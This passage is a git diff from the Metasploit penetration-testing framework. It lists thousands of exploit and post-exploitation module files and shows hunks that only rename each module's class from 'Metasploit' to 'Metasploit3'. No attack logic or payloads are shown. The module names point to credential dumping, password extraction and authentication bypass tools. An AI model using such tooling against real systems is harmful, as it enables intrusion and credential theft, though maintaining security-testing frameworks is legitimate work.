2 +- modules/post/windows/gather/enum_dirperms.rb | 2 +- modules/post/windows/gather/enum_domain.rb | 2 +- modules/post/windows/gather/enum_domain_group_users.rb | 2 +- modules/post/windows/gather/enum_domain_tokens.rb | 2 +- modules/post/windows/gather/enum_domain_users.rb | 2 +- modules/post/windows/gather/enum_domains.rb | 2 +- modules/post/windows/gather/enum_files.rb | 2 +- modules/post/windows/gather/enum_hostfile.rb | 2 +- modules/post/windows/gather/enum_ie.rb | 2 +- modules/post/windows/gather/enum_logged_on_users.rb | 2 +- modules/post/windows/gather/enum_ms_product_keys.rb | 2 +- modules/post/windows/gather/enum_muicache.rb | 2 +- modules/post/windows/gather/enum_patches.rb | 2 +- modules/post/windows/gather/enum_powershell_env.rb | 2 +- modules/post/windows/gather/enum_prefetch.rb | 2 +- modules/post/windows/gather/enum_proxy.rb | 2 +- modules/post/windows/gather/enum_putty_saved_sessions.rb | 2 +- modules/post/windows/gather/enum_services.rb | 2 +- modules/post/windows/gather/enum_shares.rb | 2 +- modules/post/windows/gather/enum_snmp.rb | 2 +- modules/post/windows/gather/enum_termserv.rb | 2 +- modules/post/windows/gather/enum_tokens.rb | 2 +- modules/post/windows/gather/enum_tomcat.rb | 2 +- modules/post/windows/gather/enum_unattend.rb | 2 +- modules/post/windows/gather/file_from_raw_ntfs.rb | 2 +- modules/post/windows/gather/forensics/browser_history.rb | 2 +- modules/post/windows/gather/forensics/duqu_check.rb | 2 +- modules/post/windows/gather/forensics/enum_drives.rb | 2 +- modules/post/windows/gather/forensics/imager.rb | 2 +- modules/post/windows/gather/forensics/nbd_server.rb | 2 +- modules/post/windows/gather/forensics/recovery_files.rb | 2 +- modules/post/windows/gather/hashdump.rb | 2 +- modules/post/windows/gather/local_admin_search_enum.rb | 2 +- modules/post/windows/gather/lsa_secrets.rb | 2 +- modules/post/windows/gather/memory_grep.rb | 2 +- modules/post/windows/gather/netlm_downgrade.rb | 2 +- modules/post/windows/gather/outlook.rb | 2 +- modules/post/windows/gather/phish_windows_credentials.rb | 2 +- modules/post/windows/gather/resolve_sid.rb | 2 +- modules/post/windows/gather/reverse_lookup.rb | 2 +- modules/post/windows/gather/screen_spy.rb | 2 +- modules/post/windows/gather/smart_hashdump.rb | 2 +- modules/post/windows/gather/tcpnetstat.rb | 2 +- modules/post/windows/gather/usb_history.rb | 2 +- modules/post/windows/gather/win_privs.rb | 2 +- modules/post/windows/gather/wmic_command.rb | 2 +- modules/post/windows/gather/word_unc_injector.rb | 2 +- modules/post/windows/manage/add_user_domain.rb | 2 +- modules/post/windows/manage/autoroute.rb | 2 +- modules/post/windows/manage/change_password.rb | 2 +- modules/post/windows/manage/clone_proxy_settings.rb | 2 +- modules/post/windows/manage/delete_user.rb | 2 +- modules/post/windows/manage/download_exec.rb | 2 +- modules/post/windows/manage/driver_loader.rb | 2 +- modules/post/windows/manage/enable_rdp.rb | 2 +- modules/post/windows/manage/enable_support_account.rb | 2 +- modules/post/windows/manage/exec_powershell.rb | 2 +- modules/post/windows/manage/forward_pageant.rb | 2 +- modules/post/windows/manage/ie_proxypac.rb | 2 +- modules/post/windows/manage/inject_ca.rb | 2 +- modules/post/windows/manage/inject_host.rb | 2 +- modules/post/windows/manage/migrate.rb | 2 +- modules/post/windows/manage/mssql_local_auth_bypass.rb | 2 +- modules/post/windows/manage/multi_meterpreter_inject.rb | 2 +- modules/post/windows/manage/nbd_server.rb | 2 +- modules/post/windows/manage/payload_inject.rb | 2 +- modules/post/windows/manage/portproxy.rb | 2 +- modules/post/windows/manage/powershell/exec_powershell.rb | 2 +- modules/post/windows/manage/powershell/load_script.rb | 2 +- modules/post/windows/manage/pptp_tunnel.rb | 2 +- modules/post/windows/manage/priv_migrate.rb | 2 +- modules/post/windows/manage/pxeexploit.rb | 2 +- modules/post/windows/manage/reflective_dll_inject.rb | 2 +- modules/post/windows/manage/remove_ca.rb | 2 +- modules/post/windows/manage/remove_host.rb | 2 +- modules/post/windows/manage/rpcapd_start.rb | 2 +- modules/post/windows/manage/run_as.rb | 2 +- modules/post/windows/manage/sdel.rb | 2 +- modules/post/windows/manage/smart_migrate.rb | 2 +- modules/post/windows/manage/vss_create.rb | 2 +- modules/post/windows/manage/vss_list.rb | 2 +- modules/post/windows/manage/vss_mount.rb | 2 +- modules/post/windows/manage/vss_set_storage.rb | 2 +- modules/post/windows/manage/vss_storage.rb | 2 +- modules/post/windows/manage/webcam.rb | 2 +- modules/post/windows/recon/computer_browser_discovery.rb | 2 +- modules/post/windows/recon/outbound_ports.rb | 2 +- modules/post/windows/recon/resolve_ip.rb | 2 +- modules/post/windows/wlan/wlan_bss_list.rb | 2 +- modules/post/windows/wlan/wlan_current_connection.rb | 2 +- modules/post/windows/wlan/wlan_disconnect.rb | 2 +- modules/post/windows/wlan/wlan_profile.rb | 2 +- 2539 files changed, 2539 insertions(+), 2539 deletions(-) diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index a5ea810cf9..ee2572bebb 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb index a17e18662e..d3aed5b3dc 100644 --- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb +++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 8c6b8e8ebe..357338b434 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb +++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 23fb5ef068..7f76f33d07 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::NDMP diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 0c52fa52df..171d2d7a04 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include ::Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index 40658ead7f..c706eea4f0 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 01b31d2ac1..6f8d5738fb 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index 7108b755fa..ce62291515 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index cf5291f7a1..9fbc5aff7d 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index 8e912c1f7c..e2970315f0 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index c0a27c9503..1c54a65368 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index c0996f536d..1c99844b0f 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index af93a94055..3f21a39c33 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb index abc96e5150..55f85637ae 100644 --- a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb +++ b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 3089307412..6e6a7939a0 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index e933ab6436..725f125d26 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index bb2e3f48e2..cc807330d1 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index 7281c70f9e..e7e9f7de48 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb index e282836f5d..cb17b5cc91 100644 --- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index b2e2be1807..5a1fcb3cd2 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index cef2cd2e8f..0d999c859a 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index d4773df9d8..036a3ee2cc 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index 7775a44268..e3b3932032 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 203ccb1e89..1e1d9dbf8d 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index 50dad450a1..a427ac2009 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss diff --git a/modules/auxiliary/admin/http/jboss_seam_exec.rb b/modules/auxiliary/admin/http/jboss_seam_exec.rb index 10de5cc9a9..e6b097d165 100644 --- a/modules/auxiliary/admin/http/jboss_seam_exec.rb +++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index a631c0abbb..d7046167c7 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/limesurvey_file_download.rb b/modules/auxiliary/admin/http/limesurvey_file_download.rb index 13fc6f3a08..a1c019c933 100644 --- a/modules/auxiliary/admin/http/limesurvey_file_download.rb +++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb @@ -8,7 +8,7 @@ require 'msf/core' # for extracting files require 'zip' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb index 14162c3de7..0bae51aafa 100644 --- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb +++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index d5f3a5fffd..f5b371da2b 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 9c728fcc6a..c1ad331aae 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 26077c3ea1..871d6c8830 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index 82f2509e42..9d782c370c 100644 --- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index 2f0005eef9..fe04617a13 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index d1e6606939..0dc6890946 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index bfb8a8497c..d42ee31992 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 548cc44630..5b920ae2c0 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index 676f9ab595..f7e8ee50c1 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb +++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index f8edfbf2f9..6a12988779 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 6023a2b02d..991b706893 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/element' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index d6fd938bef..4f7a947b08 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index a4cc833721..ee19d364b1 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index 852b1f2745..ed9226caa4 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index 936ba933d5..f010b3f631 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 7a6d093916..308d928a81 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index 9f584f16d7..b987960189 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 0b52b65e57..ae1f0a6a32 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 88094b0f81..5e5043da0e 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 827df081ff..3e43c502d6 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index da7e6cf540..bba990712d 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index c19487ffa1..21cb5b66ce 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 304a000cb9..4051e0baa5 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include 